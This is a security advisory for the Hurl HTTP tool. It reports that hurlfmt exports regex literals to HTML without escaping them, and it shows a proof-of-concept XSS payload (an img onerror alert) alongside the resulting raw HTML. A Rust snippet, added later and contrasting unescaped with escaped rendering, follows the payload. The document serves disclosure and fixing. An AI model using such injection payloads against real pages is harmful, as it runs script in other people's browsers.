GHSA-v33j-v3x4-42qg

Source
https://github.com/advisories/GHSA-v33j-v3x4-42qg
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-v33j-v3x4-42qg/GHSA-v33j-v3x4-42qg.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-v33j-v3x4-42qg
Published
2025-06-11T14:46:37Z
Modified
2025-06-11T14:46:37Z
Summary
Regex literals in Hurl files are not escaped when exported to HTML, allowing injections
Details

Given this Hurl file:

regex.hurl:

GET https://foo.com
HTTP 200
[Asserts]
jsonpath "$.body" matches /<img src="" onerror="alert('Hi!')">/

When exported to HTML:

$ hurlfmt --out html regex.hurl
<pre><code class="language-hurl"><span class="hurl-entry"><span class="request"><span class="line"><span class="method">GET</span> <span class="url">https://foo.com</span></span>
</span><span class="response"><span class="line"><span class="version">HTTP</span> <span class="number">200</span></span>
<span class="line"><span class="section-header">[Asserts]</span></span>
<span class="line"><span class="query-type">jsonpath</span> <span class="string">"$.body"</span> <span class="predicate-type">matches</span> <span class="regex">/<img src="" onerror="alert('Hi!')">/</span></span>
</span></span><span class="line"></span>
</code></pre>

The regex literal /<img src="" onerror="alert('Hi!')">/ is not escaped:

<span class="regex">/<img src="" onerror="alert('Hi!')">/</span></span>

When opened in a browser, the code is run without user interaction:

[image: regex (screenshot of the exported HTML opened in a browser)]
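An added example, not hurlfmt's own code: it contrasts an HTML export that interpolates the regex literal verbatim into the `<span class="regex">` markup (the behaviour described above) with one that HTML-escapes every source-derived string first. The function names, the `html_escape` helper and the `raw_tag_count` check are assumptions for illustration; the sample literal is the one from the advisory.

```rust
// Added example, not code from the hurl project. Function names and the
// checks below are assumptions chosen to illustrate the escaping fix.

/// The regex literal from the advisory (constructed input for the demo).
const SAMPLE_LITERAL: &str = r#"<img src="" onerror="alert('Hi!')">"#;

/// Escape the five characters that can break out of HTML text content
/// or an attribute value. Anything copied from a source file into
/// generated markup must pass through here.
fn html_escape(s: &str) -> String {
    let mut out = String::with_capacity(s.len());
    for c in s.chars() {
        match c {
            '&' => out.push_str("&amp;"),
            '<' => out.push_str("&lt;"),
            '>' => out.push_str("&gt;"),
            '"' => out.push_str("&quot;"),
            '\'' => out.push_str("&#x27;"),
            _ => out.push(c),
        }
    }
    out
}

/// Vulnerable rendering: the literal is concatenated as-is, so any markup
/// it contains becomes live markup in the exported document.
fn render_regex_unescaped(literal: &str) -> String {
    format!("<span class=\"regex\">/{}/</span>", literal)
}

/// Hardened rendering: the literal is escaped before concatenation, so the
/// browser shows the regex text instead of interpreting it.
fn render_regex_escaped(literal: &str) -> String {
    format!("<span class=\"regex\">/{}/</span>", html_escape(literal))
}

/// Simple check for the exported fragment: a single rendered span should
/// contain exactly two raw '<' (its own opening and closing tag). Any
/// extra one means source text leaked into the markup unescaped.
fn raw_tag_count(html: &str) -> usize {
    html.matches('<').count()
}

fn main() {
    let bad = render_regex_unescaped(SAMPLE_LITERAL);
    let good = render_regex_escaped(SAMPLE_LITERAL);
    println!("unescaped ({} raw tags): {}", raw_tag_count(&bad), bad);
    println!("escaped   ({} raw tags): {}", raw_tag_count(&good), good);
}
```

The `raw_tag_count` check is a cheap regression test for a formatter's HTML output, not a substitute for escaping: the fix is that every user-controlled string goes through `html_escape` (or the equivalent in the HTML library in use) before it reaches the output buffer.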

Database specific
{
    "nvd_published_at": null,
    "cwe_ids": [],
    "severity": "MODERATE",
    "github_reviewed": true,
    "github_reviewed_at": "2025-06-11T14:46:37Z"
}
References

Affected packages

Package: crates.io / hurl

Affected ranges

Type: SEMVER
Events:
  Introduced: 0 (unknown introduced version; all previous versions are affected)
  Fixed: 7.0.0

Database specific

{
    "last_known_affected_version_range": "<= 6.1.1"
}